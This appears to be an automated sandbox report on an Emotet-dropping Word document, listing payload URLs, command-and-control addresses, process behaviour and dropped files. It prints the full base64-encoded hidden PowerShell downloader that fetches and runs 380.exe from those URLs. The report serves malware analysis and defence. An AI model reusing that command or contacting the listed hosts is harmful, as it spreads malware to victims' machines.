Analysis
-
max time kernel
28s -
resource
win10v191014 -
submitted
14-01-2020 23:35
General
Malware Config
Extracted
http://xmdivas.com/a9981b580e0fef550bcb0fd8fadcc02b/eiqgv/
http://digitaltimbangan.com/cgi-bin/cj8/
https://sports.tj/wp-includes/p5n5i1d/
https://work4sales.com/wp-content/rw5N8k08Ed/
https://rmntnk.ru/omlakdj17fkcjfsd/rxm1/
Extracted
emotet
66.7.242.50:8080
72.186.137.156:80
197.89.27.26:8080
91.250.96.22:8080
37.187.72.193:8080
104.131.44.150:8080
167.71.10.37:8080
78.24.219.147:8080
159.65.25.128:8080
95.128.43.213:8080
179.13.185.19:80
186.86.247.171:443
110.142.38.16:80
201.173.217.124:443
169.239.182.217:8080
211.63.71.72:8080
104.131.11.150:8080
190.55.181.54:443
209.146.22.34:443
64.53.242.181:8080
190.220.19.82:443
66.34.201.20:7080
27.109.153.201:8090
46.105.131.69:443
110.36.217.66:8080
120.151.135.224:80
73.217.39.73:80
87.230.19.21:8080
47.180.91.213:80
73.11.153.178:8080
45.33.49.124:443
209.141.54.221:8080
121.88.5.176:443
31.31.77.83:443
79.159.249.152:80
178.237.139.83:8080
180.92.239.110:8080
201.229.45.222:8080
173.21.26.90:80
200.116.145.225:443
221.165.123.72:80
217.160.182.191:8080
47.6.15.79:80
60.231.217.199:8080
91.205.215.66:443
182.176.132.213:8090
181.143.126.170:80
70.169.53.234:80
176.106.183.253:8080
92.222.216.44:8080
87.106.136.232:8080
103.86.49.11:8080
5.196.74.210:8080
78.142.114.69:80
105.247.123.133:8080
47.6.15.79:443
98.174.166.205:80
110.143.84.202:80
95.213.236.64:8080
2.237.76.249:80
45.51.40.140:80
91.73.197.90:80
78.186.5.109:443
120.150.246.241:80
195.244.215.206:80
58.171.42.66:8080
190.117.126.169:80
37.157.194.134:443
192.241.255.77:8080
190.12.119.180:443
190.117.226.104:80
116.48.142.21:443
200.21.90.5:443
62.75.187.192:8080
41.60.200.34:80
70.46.247.81:80
85.67.10.190:80
223.197.185.60:80
190.146.205.227:8080
62.138.26.28:8080
5.32.55.214:80
108.191.2.72:80
59.103.164.174:80
178.153.176.124:80
78.189.180.107:80
87.106.139.101:8080
210.6.85.121:80
47.156.70.145:80
173.91.11.142:80
31.172.240.91:8080
88.249.120.205:80
37.139.21.175:8080
115.95.6.218:443
206.81.10.215:8080
105.27.155.182:80
209.97.168.52:8080
205.185.117.108:8080
24.164.79.147:8080
188.0.135.237:80
139.130.242.43:80
46.105.131.87:80
189.203.177.41:443
149.202.153.252:8080
98.156.206.153:80
160.16.215.66:8080
201.184.105.242:443
98.30.113.161:80
5.154.58.24:80
173.66.96.135:80
206.189.112.148:8080
70.175.171.251:80
190.53.135.159:21
24.105.202.216:443
89.211.186.227:443
108.179.206.219:8080
139.130.241.252:443
50.116.86.205:8080
181.126.70.117:80
24.94.237.248:80
62.75.141.82:80
183.102.238.69:465
177.239.160.121:80
104.236.246.93:8080
47.153.183.211:80
Signatures
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3712 powershell.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
Processes:
380.exemethodsdispid.exepid process 3964 380.exe 3772 methodsdispid.exe -
Drops file in System32 directory 1 IoCs
Processes:
380.exedescription ioc process File renamed C:\Users\Admin\380.exe => C:\Windows\SysWOW64\methodsdispid.exe 380.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
WINWORD.EXE380.exe380.exemethodsdispid.exemethodsdispid.exepid process 4988 WINWORD.EXE 4732 380.exe 3964 380.exe 4332 methodsdispid.exe 3772 methodsdispid.exe -
Process spawned unexpected child process 1 IoCs
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3712 1976 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
powershell.exe380.exemethodsdispid.exedescription pid process target process PID 3712 wrote to memory of 4732 3712 powershell.exe 380.exe PID 4732 wrote to memory of 3964 4732 380.exe 380.exe PID 4332 wrote to memory of 3772 4332 methodsdispid.exe methodsdispid.exe -
Executes dropped EXE 4 IoCs
Processes:
380.exe380.exemethodsdispid.exemethodsdispid.exepid process 4732 380.exe 3964 380.exe 4332 methodsdispid.exe 3772 methodsdispid.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4988 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 3712 powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ba266e91b64c51e7256d079867b421c0784b6bd0c16fb6032f542d73bf607d1e.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -en JABOAHoAeQBsAHIAdwBiAG0AawB0AD0AJwBBAHAAbgBtAGQAdgB6AHQAJwA7ACQAWgBxAHAAdgB4AHgAaABvAGsAcgAgAD0AIAAnADMAOAAwACcAOwAkAFgAcgBzAHYAcgBuAGUAYwBoAGsAPQAnAEgAZwBkAHMAcgB6AG4AegBnAGwAJwA7ACQAVABuAHoAdgBiAHgAaABlAG8AawBuAGEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoAcQBwAHYAeAB4AGgAbwBrAHIAKwAnAC4AZQB4AGUAJwA7ACQASQBqAHYAawBvAHMAcgB6AG8AcABhAHUAegA9ACcAWQBmAHEAeABxAGkAZgBmAGYAYQAnADsAJABHAHUAbAB4AGsAcgB5AGgAcQBmAGcAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4ARQBUAC4AVwBlAEIAQwBMAGkARQBOAHQAOwAkAEkAbQBzAGYAcQBxAGgAZABnAGUAdgBiAG0APQAnAGgAdAB0AHAAOgAvAC8AeABtAGQAaQB2AGEAcwAuAGMAbwBtAC8AYQA5ADkAOAAxAGIANQA4ADAAZQAwAGYAZQBmADUANQAwAGIAYwBiADAAZgBkADgAZgBhAGQAYwBjADAAMgBiAC8AZQBpAHEAZwB2AC8AKgBoAHQAdABwADoALwAvAGQAaQBnAGkAdABhAGwAdABpAG0AYgBhAG4AZwBhAG4ALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBjAGoAOAAvACoAaAB0AHQAcABzADoALwAvAHMAcABvAHIAdABzAC4AdABqAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcAA1AG4ANQBpADEAZAAvACoAaAB0AHQAcABzADoALwAvAHcAbwByAGsANABzAGEAbABlAHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwByAHcANQBOADgAawAwADgARQBkAC8AKgBoAHQAdABwAHMAOgAvAC8AcgBtAG4AdABuAGsALgByAHUALwBvAG0AbABhAGsAZABqADEANwBmAGsAYwBqAGYAcwBkAC8AcgB4AG0AMQAvACcALgAiAFMAUABMAGAAaQB0ACIAKAAnACoAJwApADsAJABVAHcAegBkAG0AYgB3AG4AaAA9ACcATwBvAHMAcwB2AHMAZgBpAHQAcABwAG8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMAZwBuAHUAagBqAGoAbgBnAG8AdAAgAGkAbgAgACQASQBtAHMAZgBxAHEAaABkAGcAZQB2AGIAbQApAHsAdAByAHkAewAkAEcAdQBsAHgAawByAHkAaABxAGYAZwAuACIAZABvAHcATgBgAGwAbwBhAEQAYABGAGkATABFACIAKAAkAFMAZwBuAHUAagBqAGoAbgBnAG8AdAAsACAAJABUAG4AegB2AGIAeABoAGUAbwBrAG4AYQApADsAJABOAHoAbgBjAGUAcABqAGwAawB4AGMAPQAnAE4AcwBkAG4AYwBnAGwAYwBpAHgAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABUAG4AegB2AGIAeABoAGUAbwBrAG4AYQApAC4AIgBsAGUAbgBgAEcAVABIACIAIAAtAGcAZQAgADMAMgA0ADUAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAVAAiACgAJABUAG4AegB2AGIAeABoAGUAbwBrAG4AYQApADsAJABBAHMAagBzAGYAaQBnAG8AegBjAGkAPQAnAEMAagBjAGUAdgBwAGcAZwAnADsAYgByAGUAYQBrADsAJABRAGIAbgBpAGgAbgBlAGIAeAByAHEAPQAnAEIAcgByAHUAaQB5AG8AcQB1AGMAeQBkACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAYwBhAGQAaABpAGMAdABxAHMAegB5AGEAPQAnAEwAdABtAG4AcwBhAG0AZAAnAA==1⤵
- Suspicious use of AdjustPrivilegeToken
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\380.exe"C:\Users\Admin\380.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Users\Admin\380.exe--4c4a25093⤵
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
-
C:\Windows\SysWOW64\methodsdispid.exe"C:\Windows\SysWOW64\methodsdispid.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Windows\SysWOW64\methodsdispid.exe--f4d1fd052⤵
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\403f0cc78adafaecdb503a6c6424923d_293fa5bd-edfb-4bba-800e-a7dce3ea3438
-
C:\Users\Admin\380.exe
-
C:\Users\Admin\380.exe
-
C:\Users\Admin\380.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
-
C:\Windows\SysWOW64\methodsdispid.exe
-
C:\Windows\SysWOW64\methodsdispid.exe
-
memory/3772-16-0x0000000000CF0000-0x0000000000D07000-memory.dmpFilesize
92KB
-
memory/3772-17-0x0000000000400000-0x000000000046E000-memory.dmpFilesize
440KB
-
memory/3964-11-0x0000000000400000-0x000000000046E000-memory.dmpFilesize
440KB
-
memory/3964-10-0x0000000002030000-0x0000000002047000-memory.dmpFilesize
92KB
-
memory/4332-13-0x0000000000590000-0x00000000005A7000-memory.dmpFilesize
92KB
-
memory/4732-7-0x0000000000640000-0x0000000000657000-memory.dmpFilesize
92KB